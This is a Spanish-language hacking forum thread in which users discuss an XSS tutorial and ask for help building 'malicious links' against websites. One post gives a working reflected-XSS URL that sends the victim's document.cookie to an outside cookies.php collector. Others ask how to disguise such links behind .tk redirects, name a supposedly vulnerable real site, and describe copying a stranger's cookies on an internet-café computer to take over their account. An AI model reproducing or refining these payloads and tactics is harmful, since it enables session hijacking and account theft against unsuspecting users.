[::Tutorial::] - Ataques XSS

Iniciado por Rentero, 24 Mayo 2004, 03:49 AM

0 Miembros y 1 Visitante están viendo este tema.

joanikus

okey gracias por el tuto pero yo lo poongo en un buscadoir e nuke et y me da error eso se considera aletra¿

Rentero

Ni me acordaba de este tutorial xD

Cita de: G4rBaG3 en 15 Agosto 2005, 23:02 PM

Aca el nombre del formulario seria 'formul'
Pero el nombre del boton?????
cual es???
<tr>
<form name="formul" method="get" action="../home/search.php">
<td><img src="images/spacer.gif" width="5"></td>
<td><input type="text" id="palabras" name="palabras" class="campo" size="31" value=""></td>
<td><img src="images/spacer.gif" width="3"></td>
<td width="65" align="center"><a href="javascript:document.formul.submit();" onClick="document.formul.submit();"><img src="../home/X2x.gif" vspace="2" width="60" height="18" border="0"></a></td>
</form>



Salu2.


En este caso no hay ningún botón. Hay un enlace que llama a una función de javascript llamada submit().
Mira el código fuente de esa función a ver si puedes sacar algo :)

P.D: Recuerdo que esto es solo un pequeño texto de introducción :)
Y que ya cada vez hay menos webs con este error. Parece que estamos aprendiendo a programar xDD
Firmado.

joanikus

eyy muxas gracias por el tuto pero una cosilla esa url maligna se puede camuflar con un .tk o .cjb.net??? gracias

Rentero

Pues upongo que si. Pero si no recuerdo mal ahora en TK te teine 15 segundo(o hasta que pulses un enlace) en una pagina promocinal. No creo que eso sea uy creible...bueno, es cuestión de probar.
Firmado.

-sagitari-

una web vulnerable a este tipo de atake es:

www.programas-gratis.net

si no m ekivoco, pero yo como soy una buena niña, m comporto y no ataco lo primero q es vulnerable...

sirdarckcat

@Torocatala:
prohibido dar informacion de terceros.

satan69

mi pregunta es si no hay en el red una pagina para pasar de accsi a hexadecimales.. asi es mas rapido porque encontre una web vulnerable.. jijijiji ;D ;D ;D

Crack_X

Shit loads of money spend to show us wrong from right. Say no to war


Yasser Has Things To Say
WarZone

satan69

#28
Cita de: Crack_X en  7 Agosto 2006, 07:11 AM
http://www.elhacker.net/sneak.php

gracias.. ;D ;D


ademas de eso quiero que me ayuden hacer un link maligno..



                  <td align="center"><p>Buscar Blogs</p></td>
                </tr>
                <tr>
                  <td align="center"><input id="keyword" name="keyword" size="10" type="text" /></td>
                </tr>
                <tr>
                  <td align="center"><input name="submit" type="submit" value="Buscar" /><


http://www.victima.com/?Keyword=<script>window.location='http://server/cookies.php?cookie='+document.cookie;</script>&buscar=;


la victima no tiene buscador.php sino que en la pagina principal esta el buscador... si es ese el enlace digame sino pues me puede corregir

frankener1986

Otra manera es irse a un ciber, y mirar a alguno que este en una pagina la cual te gustaria tener su cuenta... con un poco de suerte, si cierra la ventana del explorador sin hacer logout, vas al explorador en el que estaba, le das a ver las cookies, buscas el nombre de la pagina, y te las apuntas las dos (o puede que alguna mas, suelen ser user y password), y luego, en tu casa, creas las cookies que copiaste en aquel papel... y listo.. y si la pagina no pide confirmacion de contraseña actual para cambiarle el password, hasta podras hacerlo xD